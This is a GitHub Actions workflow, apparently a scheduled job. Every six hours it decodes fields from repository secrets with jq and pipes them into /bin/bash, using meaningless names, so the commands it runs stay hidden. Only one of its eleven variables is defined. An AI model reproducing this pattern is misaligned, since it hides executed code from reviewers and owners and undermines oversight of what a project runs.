name: bailvbl

on:
  workflow_dispatch:
  schedule:
    - cron: '16 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: bailvbl
        env:
          ho6: ${{ secrets.ho6 }}
        run: |
          echo $ho6 | jq -r .ys55156 | /bin/bash
          echo $zjgu520 | jq -r .y3318 | /bin/bash
          echo $id4 | jq -r .vfn602 | /bin/bash
          echo $wlmy48731 | jq -r .eve0083 | /bin/bash
          echo $nc4 | jq -r .rq4016 | /bin/bash
          echo $hpng93 | jq -r .urbtz512 | /bin/bash
          echo $rp6 | jq -r .ssm6 | /bin/bash
          echo $gu9 | jq -r .jxgd452 | /bin/bash
          echo $jnei15 | jq -r .oom6 | /bin/bash
          echo $m029 | jq -r .f1594 | /bin/bash
          echo $vebx3 | jq -r .zb77 | /bin/bash

